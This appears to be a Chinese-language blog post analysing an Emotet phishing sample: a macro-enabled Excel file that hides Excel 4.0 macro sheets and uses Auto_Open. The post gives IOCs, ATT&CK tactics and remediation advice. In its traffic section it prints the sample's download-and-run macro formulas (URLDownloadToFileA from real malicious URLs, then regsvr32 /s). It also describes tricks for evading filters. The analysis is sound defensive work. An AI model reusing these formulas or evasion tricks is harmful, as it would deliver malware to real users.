• emotet木马病毒家族分析与excel宏表函数

    emotet木马病毒家族分析与excel宏表函数

    起因

    某公司邮服收到大量恶意钓鱼邮件,有员工中招后被拖通讯录,公司内大量邮箱账号密码遭到爆破。

    家族背景

    Emotet于2014 年被首次发现,最初是作为一种银行木马病毒进行传播,但随着发展逐渐囊括了越来越多的恶意程序,如Trickbot 和 QBot,以及勒索软件Conti、ProLock、Ryuk和 Egregor等,构建成了一个庞大的僵尸网络。

    样本分析

    样本属性

    文件名:VBUQ-2683135.xlsm

    文件类型:Microsoft Excel 启用宏的工作表 (.xlsm)

    MD5:129114c1b5589116cfa4af9058801b6a

    SHA1:0bfff936fcb796e1600805ce789723f51fac6e78

    SHA256:83f9bd1734c030f5053d4ab28eba39d91fdf880d1b7bb39b98602912e81ff709

    邮件样本

    邮件样本如下:

    image-20220311142550003

    解压后得到excel文件

    常见的office文档诱饵,引导受害者点击启用内容加载宏代码,如下图:

    image-20220314111246813

    攻击方式

    此次钓鱼邮件利用手法比较新颖,能够规避一般类型的检测。

    垃圾邮件中传播使用zip格式的压缩包中包含OFFICE文档或VBS脚本,这样做可以绕过CDR(内容撤防与重建)技术。在大规模网络钓鱼攻击活动期间,CDR会对进入的文件进行解构,并检查其中是否包含恶意组件。如果包含恶意组件,它会删除这些恶意组件,重新构建一个全新的版本传递给网络上的最终用户。此次样本不会在邮件中直接包含恶意组件,而是将恶意组件进行压缩投递并加密,可以绕过CDR检测技术。

    攻击者中放弃使用exe文件以下载后续有效载荷,转而使用dll文件作为后续载荷。本次宏病毒利用了Excel 4.0宏在Excel文档中的存储方式,并结合了字体颜色、工作表隐藏和列隐藏等技巧隐藏Excel 4.0宏代码。详细分析过程如下:

    首先攻击者将工作表隐藏,只留下了sheet1作为诱饵图片引诱受害者点击启用内容调用宏代码

    先把隐藏的工作表显示出来:

    image-20220315115538390

    显示隐藏的白色字体:

    image-20220315120033399

    显示后为攻击者的字典表,其他表会通过excel的拼接调用这张表的字符来组成攻击语句

    image-20220315143402748

    同样的方法显示其余工作表,可以看到攻击者会去请求以下URL地址

    image-20220315143508831

    入口函数:

    image-20220315115355851

    通过拼接Vfrbuk1工作表组成恶意语句

    image-20220315144310574

    这里的EFALGV表启用了excel 4.0的宏表函数

    将列的第一个单元格重命名为Auto_Open,会使整列按顺序执行宏表函数

    其中D1的单元格名称就为Auto_Open

    image-20220316175630358

    宏代码分析

    点击启用内容后,自动拼接成如下语句

    image-20220315162956958

    FORMULA(a,b)是excel4.0宏表函数,意思是把a的值赋值给b

    CALL()只在excel宏表上可用,用来调用动态链接库dll文件

    最后通过EXEC()函数来执行命令,利用regsvr32.exe调用dll文件(aew.ocx),/s为静默运行

    启用内容后:

    image-20220316200246381

    aew.ocx文件会写入用户目录,之后会把自身拷贝到AppData\Local目录的随机名文件夹下

    恶意程序会向注册表写入一条启动项

    计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

    image-20220316200714996

    image-20220316201356098

    可执行文件分析

    小编对二进制及逆向研究不深 此小章可能有许多纰漏,希望师傅们能与我交流指正

    没有找到如绿盟(http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/)这篇分析文章 有关窃取邮箱的伪代码 有熟悉x64dbg、IDA的师傅们可以联系我 想学习一下

    aew.ocx可执行文件

    image-20220314175017316

    以下分析这个aew.ocx可执行文件

    wininet dll断点

    image-20220316082732238

    读取浏览器Internet存储的临时文件,历史记录和cookie

    image-20220316082948874

    image-20220316083013346

    image-20220316083033598

    断在httpsendRequestW,此时c2 list已经解密成功了,我们从cookie往上翻一点就可以找到

    image-20220316083405691

    image-20220316085919209

    流量分析

    单步调试宏表函数

    有https的抓不到流量,在复现的时候目标网站均已无法下载ocx文件

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://shabdsangramnews.com/wp-includes/0EkuXhpisAiyU/","..\aew.ocx",0,0)

    image-20220316114432591

    =IF(GFGH1<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://newmainghantabazar.com/wp-includes/UOMqB99D/","..\aew.ocx",0,0))

    image-20220316115449401

    =IF(GFGH2<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://dehraduncabs.com/wp-includes/nQrr0/","..\aew.ocx",0,0))

    image-20220316115859589

    =IF(GFGH3<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://patriciamirapsicologa.com/wp-includes/OfXgW/","..\aew.ocx",0,0))

    image-20220316145435227

    =IF(GFGH4<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://vdheuvel.net/gallerijen/MZM66d1KZQI0IjLc/","..\aew.ocx",0,0))

    image-20220316145646255

    =IF(GFGH5<0, CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://googletopstories.in/wp-admin/css/colors/4Fx/","..\aew.ocx",0,0))

    image-20220316201131656

    查杀结果

    结合云沙箱运行文件和ip域名查询

    VT查杀

    image-20220314145805490

    微步查询域名:shabdsangramnews.com

    image-20220314145700453

    查询IP:185.168.130.138

    image-20220314145855486

    aew.ocx查杀结果:

    image-20220316165337141

    IOCs(失陷指标)

    shabdsangramnews.com
newmainghantabazar.com
dehraduncabs.com
patriciamirapsicologa.com
vdheuvel.net
googletopstories.in
168.119.39.118
185.168.130.138
168.197.250.14
195.77.239.39
68.183.93.250
185.184.25.78
118.98.72.86
78.47.204.80
159.69.237.188
61.7.231.226
103.41.204.169
207.148.81.119
85.214.67.203
190.90.233.66
191.252.103.16
93.104.209.107
194.9.172.107
66.42.57.149
59.148.253.194
62.171.178.147
139.196.72.155
198.199.98.78
185.148.168.15
195.154.146.35
104.131.62.48
37.44.244.177
217.182.143.207
54.38.242.185
185.148.168.220
203.153.216.46
87.106.97.83
78.46.73.125
54.37.106.167
37.59.209.141
54.37.228.122
61.7.231.229
45.71.195.104
116.124.128.206
128.199.192.135
210.57.209.142

    TTPs(战术、技术&程序)

    ATT&CK:TA0003(https://attack.mitre.org/tactics/TA0003/)

    1.攻击者通过大量投放钓鱼邮件,引导用户查看excel文档

    2.利用文档中带有迷惑性的图片诱导用户点击启用内容(启用宏)

    3.向攻击者的C2服务器请求内容,下载木马,达到控制计算机,实现数据窃取等黑客行为。

    攻击链路:mail->excel(xlsm excel 4.0macro)->regsvr32.exe -s ..\[random].ocx->c2 server

    image-20220316164700531

    处置建议

    宏表函数(Excel Macro4.0)是一项很老的技术了,默认设置下都会禁用,但是作为excel本身自带的功能,会对其警惕性降低,在以前这项技术没有过多的往安全性上去考虑,微软在 1993 年用 VBA 取代了 Excel 4.0 宏,但它们仍然可以运行,现在热度上升是因为被黑客盯上了。

    1.不接收和下载陌生邮件内容

    2.默认设置禁用宏,如无必要不启用宏内容

    3.清理注册表(计算机\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run)

    4.删除AppData\Local下的恶意程序

    5.安装杀软(火绒可以检测此次emotet样本)

    参考文章

    https://www.antiy.com/response/20210206.html

    http://blog.nsfocus.net/icedid-bank-trojan-sample-analysis-report/

    https://www.joesandbox.com/analysis/581892/0/html#statistics

    https://www.fortinet.com/blog/threat-research/analysis-of-the-new-modules-that-emotet-spreads

    https://stackoverflow.com/questions/41402120/what-is-excel-4-0-macro

    https://attack.mitre.org/tactics/TA0003/

    感谢此次分析工作中@DDD@gd@Scr1pt的支持与帮助
  • 相关阅读:
    UNIX高级环境编程(2)FIle I/O - 原子操作、共享文件描述符和I/O控制函数
    UNIX高级环境编程(1)File I/O
    排序算法(2) 堆排序 C++实现
    加深一下BlockingQueue的认识
    测试一下StringBuffer和StringBuilder及字面常量拼接三种字符串的效率
    java中的锁
    Http状态码之:301、302重定向
    学点HTTP知识
    java中的字符串相关知识整理
    在Openfire上弄一个简单的推送系统
  • 原文地址:https://www.cnblogs.com/LEOGG321/p/16044509.html
Copyright © 2020-2023  润新知